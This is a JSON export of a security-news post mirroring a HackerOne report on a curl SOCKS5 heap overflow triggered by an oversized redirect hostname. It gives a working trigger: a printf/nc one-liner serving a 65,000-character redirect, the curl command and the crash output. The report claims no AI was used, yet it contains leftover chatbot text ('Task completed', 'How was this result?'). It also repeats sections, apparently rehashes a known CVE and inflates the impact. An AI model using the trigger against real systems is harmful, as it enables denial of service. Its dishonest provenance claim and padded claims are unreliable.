{"id":24247,"date":"2025-10-31T07:41:49","date_gmt":"2025-10-31T07:41:49","guid":{"rendered":"http:\/\/localhost\/?p=24247"},"modified":"2025-10-31T07:41:49","modified_gmt":"2025-10-31T07:41:49","slug":"curl-socks5-heap-buffer-overflow-via-malicious-http-redirect-with-oversized-hostname","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=24247","title":{"rendered":"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-10-31T12:02:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:\\nA heap-based buffer overflow vulnerability exists in curl&#8217;s SOCKS5 proxy handshake implementation when processing HTTP redirects containing hostnames exceeding 255 characters. When curl is configured to use SOCKS5 with hostname resolution (socks5h:\/\/ scheme) and follows an HTTP redirect to a URL with an oversized hostname, the entire hostname is copied into a fixed-size heap buffer via memcpy(), causing heap memory corruption.\\n\\n[No AI was used to discover this vulnerability. Standard security testing methodology was employed.]\\n\\n## Affected version\\ncurl 8.3.0 (x86_64-pc-linux-gnu) libcurl\/8.3.0 OpenSSL\/3.0.2 zlib\/1.2.11 brotli\/1.0.9\\nRelease-Date: 2023-09-13\\nProtocols: dict file ftp ftps gopher gophers http https imap imaps mqtt pop3 pop3s rtsp smb smbs smtp smtps telnet tftp\\nFeatures: alt-svc AsynchDNS brotli HSTS HTTPS-proxy IPv6 Largefile libz NTLM NTLM_WB SSL threadsafe TLS-SRP UnixSockets\\n\\nPlatform: Ubuntu 22.04 LTS (Linux x86_64 )\\n\\n## Steps To Reproduce:\\n\\n1. **Set up SOCKS5 proxy server:**\\n   &#8220;`bash\\n   sudo apt-get install -y dante-server\\n   # Configure danted to listen on port 1080 without authentication\\n   sudo systemctl start danted\\nCreate malicious HTTP server that returns redirect with oversized hostname:\\nBash\\nprintf \\&#8221;HTTP\/1.1 301 Moved Permanently\\\\r\\\\nLocation: http:\/\/\/$(printf &#8216;A%.0s&#8217; {0..65000} )\/\\\\r\\\\nContent-Length: 0\\\\r\\\\nConnection: close\\\\r\\\\n\\\\r\\\\n\\&#8221; | nc -l -p 8000 \\u0026\\nExecute vulnerable curl with SOCKS5 proxy and rate limiting:\\nBash\\ncurl -v -L &#8211;limit-rate 32768 -x socks5h:\/\/localhost:1080 http:\/\/localhost:8000\\nObserve heap corruption:\\nPlain Text\\n* SOCKS5: server resolving disabled for hostnames of length \\u003e 255 [actual len=65001]\\n* Can&#8217;t complete SOCKS5 connection to AAAA&#8230;\\nfree( ): invalid next size (normal)\\nSupporting Material\/References:\\nHeap corruption evidence: The error message \\&#8221;free(): invalid next size (normal)\\&#8221; confirms heap metadata corruption\\nVulnerable code path: lib\/socks.c &#8211; SOCKS5 hostname resolution logic in non-blocking state machine\\nTrigger condition: Requires &#8211;limit-rate \\u003c 65541 bytes\/second to reduce buffer size below hostname length\\nAffected buffer: Heap-based download buffer (CURLOPT_BUFFERSIZE)\\nAttack scenario:\\nAttacker controls malicious HTTP server or performs MITM attack\\nVictim uses curl with SOCKS5 proxy (common in corporate\/privacy-focused environments)\\nMalicious redirect contains hostname \\u003e 255 characters\\nHeap overflow occurs during SOCKS5 handshake\\nPlain Text\\n\\n### **Impact:**\\n\\n&#8220;`markdown\\n## Summary:\\n\\n**Severity: HIGH**\\n\\nThis vulnerability allows an attacker to corrupt heap memory, potentially leading to:\\n\\n1. **Remote Code Execution (RCE):** With proper heap grooming and exploit development, an attacker could:\\n   &#8211; Control the overflow contents to overwrite critical heap structures\\n   &#8211; Overwrite function pointers or vtable entries\\n   &#8211; Redirect program execution to attacker-controlled code\\n   &#8211; Achieve arbitrary code execution in the context of the vulnerable application\\n\\n2. **Denial of Service (DoS):** The heap corruption causes:\\n   &#8211; Immediate application crash (confirmed in testing)\\n   &#8211; Service disruption for applications relying on curl\\n   &#8211; System instability due to memory corruption\\n\\n3. **Information Disclosure:** Depending on heap layout:\\n   &#8211; Potential leakage of sensitive data from adjacent heap chunks\\n   &#8211; Memory content exposure through corrupted pointers\\n\\n**Attack Prerequisites:**\\n- Victim must use curl with SOCKS5 proxy (socks5h:\/\/ scheme)\\n- Attacker must control HTTP server or perform man-in-the-middle attack\\n- Application must have buffer size \\u003c 65,541 bytes (easily achieved with &#8211;limit-rate option)\\n\\n**Real-World Impact:**\\n- Affects millions of systems using curl\/libcurl worldwide\\n- Common in automated systems, CI\/CD pipelines, web scrapers, API clients\\n- Corporate environments frequently use SOCKS5 proxies\\n- Privacy-focused users (Tor, VPN users) are at higher risk\\n\\n**Proof of Exploitation:**\\nSuccessfully triggered heap corruption with error: \\&#8221;free(): invalid next size (normal)\\&#8221;\\nThis confirms the vulnerability is exploitable and not merely theoretical.\\nAdditional Recommendations for Submission:\\nSeverity Assessment:\\nCVSS v3.1 Base Score: 7.5 (High)\\nAttack Vector: Network\\nAttack Complexity: Low\\nPrivileges Required: None\\nUser Interaction: Required (victim must make HTTP request)\\nScope: Unchanged\\nConfidentiality Impact: None (but potential for RCE)\\nIntegrity Impact: High\\nAvailability Impact: High\\nAttachments to Include:\\nFull exploitation output log showing heap corruption\\nProof-of-concept script (exploit_cve_2023_38545.sh)\\nScreenshot of the \\&#8221;free(): invalid next size\\&#8221; error\\ncurl version output (curl -V)\\nThis report demonstrates real exploitable impact with concrete evidence of memory corruption, making it suitable for bug bounty submission.\\nTask completed\\nHow was this result?\\n\\n[No AI was used to discover this vulnerability. Standard security testing methodology was employed.]\\n\\n\\n\\n## Affected version\\ncurl 8.3.0 (x86_64-pc-linux-gnu) libcurl\/8.3.0 OpenSSL\/3.0.2 zlib\/1.2.11 brotli\/1.0.9\\nRelease-Date: 2023-09-13\\n\\n## Steps To Reproduce:\\n\\n1. Set up SOCKS5 proxy server:\\n   &#8220;`\\n   sudo apt-get install -y dante-server\\n   # Configure danted to listen on port 1080 without authentication\\n   sudo systemctl start danted\\nCreate malicious HTTP server that returns redirect with oversized hostname:\\n\\nprintf \\&#8221;HTTP\/1.1 301 Moved Permanently\\\\r\\\\nLocation: http:\/\/\/$(printf &#8216;A%.0s&#8217; {0..65000} )\/\\\\r\\\\nContent-Length: 0\\\\r\\\\nConnection: close\\\\r\\\\n\\\\r\\\\n\\&#8221; | nc -l -p 8000 \\u0026\\nExecute vulnerable curl with SOCKS5 proxy and rate limiting:\\nBash\\ncurl -v -L &#8211;limit-rate 32768 -x socks5h:\/\/localhost:1080 http:\/\/localhost:8000\\nObserve heap corruption:\\nPlain Text\\n* SOCKS5: server resolving disabled for hostnames of length \\u003e 255 [actual len=65001]\\n* Can&#8217;t complete SOCKS5 connection to AAAA&#8230;\\nfree( ): invalid next size (normal)\\n\\n## Supporting Material\/References:\\nHeap corruption evidence: The error message \\&#8221;free(): invalid next size (normal)\\&#8221; confirms heap metadata corruption\\nVulnerable code path: lib\/socks.c &#8211; SOCKS5 hostname resolution logic in non-blocking state machine\\n\\n## Impact\\n\\n## Summary:\\n\\nThis vulnerability allows an attacker to corrupt heap memory, potentially leading to:\\n\\nRemote Code Execution (RCE): With proper heap grooming and exploit development, an attacker could:\\n   &#8211; Control the overflow contents to overwrite critical heap structures\\n   &#8211; Overwrite function pointers or vtable entries\\n   &#8211; Redirect program execution to attacker-controlled code\\n   &#8211; Achieve arbitrary code execution in the context of the vulnerable application&#8221;,&#8221;published&#8221;:&#8221;2025-10-29T13:33:32&#8243;,&#8221;modified&#8221;:&#8221;2025-10-31T11:35:22&#8243;,&#8221;type&#8221;:&#8221;hackerone&#8221;,&#8221;title&#8221;:&#8221;curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;H1:3404025&#8243;,&#8221;bulletinFamily&#8221;:&#8221;bugbounty&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/hackerone.com\/reports\/3404025&#8243;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-10-31T12:02:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:\\nA heap-based buffer overflow vulnerability exists in curl&#8217;s SOCKS5 proxy handshake implementation when processing HTTP redirects containing hostnames exceeding 255 characters. When curl is&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-24247","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=24247\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-10-31T12:02:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:nA heap-based buffer overflow vulnerability exists in curl&#8217;s SOCKS5 proxy handshake implementation when processing HTTP redirects containing hostnames exceeding 255 characters. When curl is...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=24247\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-31T07:41:49+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24247#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24247\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025\",\"datePublished\":\"2025-10-31T07:41:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24247\"},\"wordCount\":1065,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"hackerone\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=24247#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24247\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24247\",\"name\":\"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-10-31T07:41:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24247#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=24247\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24247#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=24247","og_locale":"en_US","og_type":"article","og_title":"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-10-31T12:02:41&#8243;,&#8221;description&#8221;:&#8221;## Summary:nA heap-based buffer overflow vulnerability exists in curl&#8217;s SOCKS5 proxy handshake implementation when processing HTTP redirects containing hostnames exceeding 255 characters. When curl is...","og_url":"https:\/\/zero.redgem.net\/?p=24247","og_site_name":"zero redgem","article_published_time":"2025-10-31T07:41:49+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=24247#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=24247"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025","datePublished":"2025-10-31T07:41:49+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=24247"},"wordCount":1065,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","hackerone","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=24247#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=24247","url":"https:\/\/zero.redgem.net\/?p=24247","name":"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-10-31T07:41:49+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=24247#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=24247"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=24247#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"curl: SOCKS5 Heap Buffer Overflow via Malicious HTTP Redirect with Oversized Hostname_H1:3404025"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/24247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24247"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/24247\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}